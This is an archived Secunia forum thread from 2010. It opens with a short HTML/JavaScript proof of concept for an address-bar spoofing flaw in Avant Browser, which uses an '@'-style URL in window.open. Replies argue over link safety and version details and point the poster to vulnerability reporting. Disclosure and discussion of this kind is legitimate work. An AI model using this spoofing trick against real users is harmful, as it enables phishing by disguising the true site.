Secunia CSI7
Advisories
Research
Forums
Create Profile
Our Commitment
PSI
PSI API
CSI
OSI
xSI
Vulnerabilities
Programs
Open Discussions
My Threads
Create Thread
Statistics
About

Forum Thread: Avant Browser Address Bar Spoofing Vulnerability

You are currently viewing a forum thread in the Secunia Community Forum. Please note that opinions expressed here are not of Secunia but solely reflect those of the user who wrote it.

This thread was submitted in the following forum:
Vulnerabilities

This thread has been marked as locked.
Pouya Avant Browser Address Bar Spoofing Vulnerability
Member 19th Jul, 2010 16:53
Ranking: 4
Posts: 6
User Since: 9th Jun, 2010
System Score: N/A
Location: IR
<!--
Avant Browser (@) Address Bar Spoofing Vulnerability
Discovered by: Pouya Daneshmand
http://Securitylab.ir/Advisories
-->
<html>
<head>
<script type="text/javascript">
function Spoof()
{
window.open("http://www.Securitylab.ir@yaho o.com");
}
</script>
</head>
<body>
<form>
<p align="center">
<input type="button" value="Click Here" onclick="Spoof()">
</p>
</form>
</body>
</html>

--
http://Pouya.Securitylab.ir

taffy078 RE: Avant Browser Address Bar Spoofing Vulnerability
Contributor 19th Jul, 2010 17:44
Score: 408
Posts: 1,320
User Since: 26th Feb 2009
System Score: 100%
Location: UK
Last edited on 19th Jul, 2010 17:44
please read what I posted in his Opera Browser thread***:

I suggest that you do not click on the link shown in this post until Secunia/an expert reads it and advises - unless you know what you are doing.

This post clearly is way beyond my technical ability but you may wish to look at the following Bing search results (or search yourself).

You'll see many unsafe sites in the search.

http://www.bing.com/search?q=pouya+Daneshmand&src=...


***http://secunia.com/community/forum/thread/show/478...

--
taffy078, West Yorkshire, UK

Desktop: Compaq Presario (OEM) 32 bit / AMD Athlon / 2 GB RAM
XP Home - SP3/ IE8/ Norton IS - Secunia PSI v2.0.0.3003

Laptop: Win 7 / IE11 / PSI v2.0.0.3003
Was this reply relevant?
+0
-0
Maurice Joyce RE: Avant Browser Address Bar Spoofing Vulnerability
Handling Contributor 20th Jul, 2010 01:47
Score: 11590
Posts: 8,901
User Since: 4th Jan 2009
System Score: N/A
Location: UK
I have tested all the sites on pages 1 & 2 produced from your hyperlink here:

http://www.bing.com/search?q=pouya+Daneshmand&src=

All are perfectly safe. If U fully research all the findings U will note that bad gradings have been contradicted by safe gradings.

This happens. Norton Safe,WOT & other like programmes are powered by user gradings or those owning websites registering their site.

Sites not reported on will receive a negative. That means nothing.

Reporting users can be novices suffering from total paranoia to researchers who file an accurate assessment of a sites safety.

At the end of the day these "add ons programmes" are advisories. If U have faith in your security there is no reason not to research sites, grade them & in most cases benefit from what they have to offer.


00:45 20/07/2010







--
Maurice

Windows 7 SP1 64 Bit OS
HP Intel Pentium i7
IE 11 for Windows 7 SP1
16GB RAM
Was this reply relevant?
+5
-0
taffy078 RE: Avant Browser Address Bar Spoofing Vulnerability
Contributor 20th Jul, 2010 08:59
Score: 408
Posts: 1,320
User Since: 26th Feb 2009
System Score: 100%
Location: UK
Last edited on 20th Jul, 2010 09:02
thank you for that Maurice.

As you know, I am not a technical expert when it comes to computers. I have to rely on the likes of Bing & Norton - both say that they test the sites, and they actually invite the owners of such sites to contact them to have the site tested. Tested sites have a red or green flag - untested sites a grey flag.

WOT is based on what users have said, as you say.

I wouldn't know how to test a site for 'safety', Maurice - I suspect many members wouldn't either. Are you saying that you simply open it and rely on your AV software to stop any problems if it is in fact a security risk site??

I do trust my AV but I wouldn't tempt fate. If I did, it would be just my luck to go to a site sontaing a threat that hasn't yet been picked up by my AV! :0)

Also, have you had chance to test the links in http://secunia.com/community/forum/thread/show/478...

--
taffy078, West Yorkshire, UK

Desktop: Compaq Presario (OEM) 32 bit / AMD Athlon / 2 GB RAM
XP Home - SP3/ IE8/ Norton IS - Secunia PSI v2.0.0.3003

Laptop: Win 7 / IE11 / PSI v2.0.0.3003
Was this reply relevant?
+0
-1
Pouya RE: Avant Browser Address Bar Spoofing Vulnerability
Member 20th Jul, 2010 12:22
Score: 4
Posts: 6
User Since: 9th Jun 2010
System Score: N/A
Location: IR
@taffy

Unsafe?, what is your purpose?

--
http://Pouya.Securitylab.ir
Was this reply relevant?
+2
-0
irsdl RE: Avant Browser Address Bar Spoofing Vulnerability
Member 20th Jul, 2010 13:16
Score: 12
Posts: 10
User Since: 16th Jul 2010
System Score: N/A
Location: UK
"http://securitylab.ir/Advisories" is not accessible.
Could you please provide more information about your findings (App. Version, Vendor, Download Link, etc...).
For example "http://secunia.com/community/forum/thread/show/478..." does not work on the latest version of Opera Browser which is 10.60.
Thanks for the contributing in advance.

--
------
Soroush Dalili
soroush.secproject.com/blog/
Was this reply relevant?
+0
-0
Pouya RE: Avant Browser Address Bar Spoofing Vulnerability
Member 20th Jul, 2010 14:09
Score: 4
Posts: 6
User Since: 9th Jun 2010
System Score: N/A
Location: IR
Avant Browser vulnerability tested on Version 11.7,build 45 (v11.7,build 46 is also vulnerable)
Opera 10.60 not work? you are wrong probably, tested on Opera v10.60,build 3445 work successfully .


--
http://Pouya.Securitylab.ir
Was this reply relevant?
+0
-0
Maurice Joyce RE: Avant Browser Address Bar Spoofing Vulnerability
Handling Contributor 20th Jul, 2010 14:20
Score: 11590
Posts: 8,901
User Since: 4th Jan 2009
System Score: N/A
Location: UK
@taffy078

I think @Pouya has answered the question for U. What is the point of all these warnings (policing) of threads when U are saying U have no idea how to test links.

Surely they should all be left alone until such time as Secunia deems them irrelevant & if necessary removes them.

I would certainly issue a warning if I could prove BEYOND doubt they were "troublesome". They are not hence I elect not to comment on individuals or hyperlinks contained within a post.

This thread is NO THREAT to anyone & as we can see has provoked a very relevant request for more information.

To save writing to other threads the same can be said for advertising of Passcert which appears to be disliked by "The Gang Of Three". They offer a lot more to the IT community than many clearly marked adverts on this thread which appear to come,in the main, from a PC comic called Computer Active.

http://secunia.com/community/forum/thread/show/465...

Better we leave all this warning (policing)type of activity to Secunia - they own both the programme & Forum & are very capable of telling us if things are amiss.

I note one Forum member considers himself part owner of the Forum. The mind boggles.

To answer your question directly of course I open all these links where unnecessary doubt is raised about their authenticity merely to counter or confirm alarmist posts.





--
Maurice

Windows 7 SP1 64 Bit OS
HP Intel Pentium i7
IE 11 for Windows 7 SP1
16GB RAM
Was this reply relevant?
+7
-2
taffy078 RE: Avant Browser Address Bar Spoofing Vulnerability
Contributor 20th Jul, 2010 14:27
Score: 408
Posts: 1,320
User Since: 26th Feb 2009
System Score: 100%
Location: UK
Last edited on 20th Jul, 2010 14:28
Everyone who has a PC has to take care to make it secure - firewalls and anti-virus software are the most well-known & well-used tools in this respect. But it’s also essential that everyone takes care when accessing new websites. Some are unsafe.

When I checked out the link (in the first post) with Norton & Bing, many of the sites shown were flagged as unsafe. For example, one had four viruses: two Bloodhound, a Backdoor & a Trojan, according to Norton.
I do realise that these sites are likely to have been ones that had reported Pouya’s findings i.e. were not his sites.

I rely on Norton & Bing to advise me of sites on the web that I should avoid. That they may occasionaly get it wrong doesn't bother me - I will always err on the side of caution, being a PC-user and not a PC-expert.

Norton's rating is a result of Symantec's automated analysis system, using their servers to analyze Web sites.
Yes - they do use reviews written by customers, some of whom may be paranoid, but these are shown separately.

As it was a Saturday i.e. likely that the Support team weren’t in, I simply posted an alert for members not to visit the linked sites until they or another expert had checked them out, or unless they knew what they were doing.
Maurice has since done that.

If you, Pouya, are the Pouya Daneshmand who discovered the vulnerabilities, I hope that you will accept my explanation.

But I would suggest that a great many members or viewers here are not experts so I stand by what I posted.

EDIT Crossed with your, Maurice.

--
taffy078, West Yorkshire, UK

Desktop: Compaq Presario (OEM) 32 bit / AMD Athlon / 2 GB RAM
XP Home - SP3/ IE8/ Norton IS - Secunia PSI v2.0.0.3003

Laptop: Win 7 / IE11 / PSI v2.0.0.3003
Was this reply relevant?
+0
-0
Anthony Wells RE: Avant Browser Address Bar Spoofing Vulnerability
Expert Contributor 20th Jul, 2010 14:28
Score: 2426
Posts: 3,315
User Since: 19th Dec 2007
System Score: N/A
Location: N/A
Last edited on 20th Jul, 2010 14:40
@Pouya ,

If you are wishing to alert Secunia themselves to look at your findings , then you might wish to email them at vuln@secunia.com as suggested by this webpage in the Advisories section of this website :-

http://secunia.com/advisories/report_vulnerability...

This forum is more used for sorting out problems with updating programmes after the PSI or the CSI software have detected a vulnerable programme/piece of software/hardware ; of course some of the more technically advanced users might find your posting(s) here of interest .

Take care

Anthony

PS: I can confirm that te hyperlinks in this post are not working (for me) from France ; the "blog" link in your other Opera tread is working

--


It always seems impossible until its done.
Nelson Mandela
Was this reply relevant?
+6
-6
Pouya RE: Avant Browser Address Bar Spoofing Vulnerability
Member 20th Jul, 2010 16:01
Score: 4
Posts: 6
User Since: 9th Jun 2010
System Score: N/A
Location: IR
@irsdl
@Anthony Wells

Opera spoofing simple video ;)
http://www.youtube.com/watch?v=lHprYkpZn6w
Quality: 720p

--
http://Pouya.Securitylab.ir
Was this reply relevant?
+2
-1
thedillpickl RE: Avant Browser Address Bar Spoofing Vulnerability
Contributor 20th Jul, 2010 17:22
Score: 376
Posts: 872
User Since: 3rd May 2009
System Score: 100%
Location: US
Last edited on 20th Jul, 2010 17:31
I understand the original purpose of this thread (somewhat). This is not it. But, as the gang's all here...

1) I hold to the foolish notion that one should not go where one has no idea what's going on. (Go ahead and make your best crack at that comment, I've come to expect it.) Simply do a little research before running scripts on any machine. Looking at reports and papers on any website could be dangerous if that site is unknown to you. Click on a link and pow. BTW, you run a risk whenever you connect to the internet. If firewalled & security software is in place, it is slight, but still there.

2) If we (That's right, I said we.) are to work together on this forum, perhaps some guidance would be in order. Everyone will not be well versed on every subject. The discussion above is a start, less remarks.

3) I was the guilty party that said I take part ownership of this forum. Of course, it is Secunia's to do with as they please. I did not set it up. I did not pay for anything. I was not asked to moderate or take any control. However, I was invited to participate. If you are to participate it is required to become involved. If you are involved it is required to interact. This is hard to do, if not impossible, when those around you are not also allowed to participate. Last I checked, Secunia still calls this a forum and not a lecture hall.


Fred

p.s. Could we call this advertising? http://secunia.com/community/forum/thread/show/480...

--
XP Home
Chrome, Firefox, IE8
--
consilio et animis
Was this reply relevant?
+4
-4
Anthony Wells RE: Avant Browser Address Bar Spoofing Vulnerability
Expert Contributor 21st Jul, 2010 12:22
Score: 2426
Posts: 3,315
User Since: 19th Dec 2007
System Score: N/A
Location: N/A

@Pouya ,

Thank you for the link to your Opera spoofing video on YouTube ; most enlightening :)

Take care
Anthony

--


It always seems impossible until its done.
Nelson Mandela
Was this reply relevant?
+1
-1

This thread has been marked as locked.


 Products Solutions Customers Partner Resources Company
 
 Corporate
Vulnerability Intelligence Manager (VIM)
Corporate Software Inspector (CSI)
Consumer
Personal Software Inspector (PSI)
Online Software Inspector (OSI)
 Industry
Compliance
Technology
Integration
 Customers
Testimonials
 VARS
MSSP
Technology Partners
References
 Reports
Webinars
Events
 About us
Careers
Memberships
Newsroom


 
© 2002-2014 Secunia ApS - Rued Langgaards Vej 8, 4th floor, DK-2300 Copenhagen, Denmark - +45 7020 5144
Terms & Conditions and Copyright - Privacy - Report Vulnerability